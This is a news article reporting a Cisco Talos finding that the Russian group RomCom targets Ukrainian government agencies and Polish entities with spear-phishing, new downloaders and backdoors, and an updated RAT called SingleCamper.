Breaking News: 42% of Mac USers Use All Apps On A Regular Basics.

Energy

Russian Threat Actor RomCom Targets Ukrainian and Polish Entities with Advanced Cyber Attacks

The Russian cybercriminal group RomCom has launched a new wave of cyberattacks against Ukrainian government agencies and unidentified Polish entities since late 2023. These attacks feature a modified version of the RomCom RAT, called SingleCamper (also known as SnipBot or RomCom 5.0), according to a report by Cisco Talos, which is monitoring the activity under the code name UAT-5647.

RomCom, also tracked as Storm-0978, Tropical Scorpius, UAC-0180, UNC2596, and Void Rabisu, has been involved in ransomware, extortion, and targeted credential theft since its emergence in 2022. Recent activities show an increased operational tempo with a clear espionage agenda, aiming to set up long-term access to compromised networks and steal sensitive data.

The attacks begin with spear-phishing emails that deliver downloaders written in C++ (MeltingClaw) or Rust (RustyClaw), which install backdoors like ShadyHammock and DustyHammock. These backdoors enable remote control, execute commands, and initiate data exfiltration. SingleCamper, the latest RomCom RAT version, conducts various post-compromise tasks such as network reconnaissance, lateral movement, and remote tunneling using PuTTY’s Plink tool.

The campaign’s goal appears twofold: maintaining long-term espionage access to steal critical information, and potentially deploying ransomware for financial gain. Researchers believe Polish entities may also have been targeted due to the malware’s ability to check keyboard language settings.

Related posts
Energy

UK Regulator Fines Wise CEO £350,000 Over Tax Reporting Lapses

Energy

Asset Managers Roll Out New AI-Focused ETFs Amid Growing Market Enthusiasm

Energy

New OS Downgrade Vulnerability Threatens Windows Security: Attackers Bypass Driver Signature Enforcement to Deploy Rootkits

Energy

The Ultimate DSPM Guide: Webinar on Building a Strong Data Security Posture

Leave a Reply

Your email address will not be published. Required fields are marked *